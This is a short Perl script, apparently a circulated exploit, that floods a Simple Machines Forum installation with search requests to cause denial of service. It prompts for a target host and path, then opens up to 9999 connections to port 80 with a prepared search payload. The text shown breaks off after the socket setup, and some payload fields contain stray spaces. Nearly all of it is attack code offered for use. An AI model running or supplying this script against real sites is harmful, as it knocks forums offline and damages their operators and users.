#!/usr/bin/perl
use IO::Socket;
################################################## ########
##Simple Machines Forum (SMF) Multiple Search Denial of Service #
##Created By Go0o$E #
##Antichat Forever #
##http://www.antichat.ru #
##Go0oSE@list.ru #
################################################## ########
print q{
################################################## ##########
# Simple Machines Forum (SMF) Multiple Search DOS #
# Tested on SMF 1.1 rc2 #
# Created By Go0o$E. Antichat only and forever! #
################################################## ##########
};
$rand=rand(10);
print "Forum Host: ";
$serv = <stdin>;
chop ($serv);
print "Forum Path: ";
$path = <stdin>;
chop ($path);
for ($i=0; $i<9999; $i++)
{
$postit = "search=Albanian+Hackers+Group+Proof+of+Concept+$x +&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat =-1&sort_by=0&sort_dir=ASC&show_results=posts&return _chars=200";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$serv",
PeerPort => "80",
Proto => "tcp",
);
die "\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\n" unless $sock;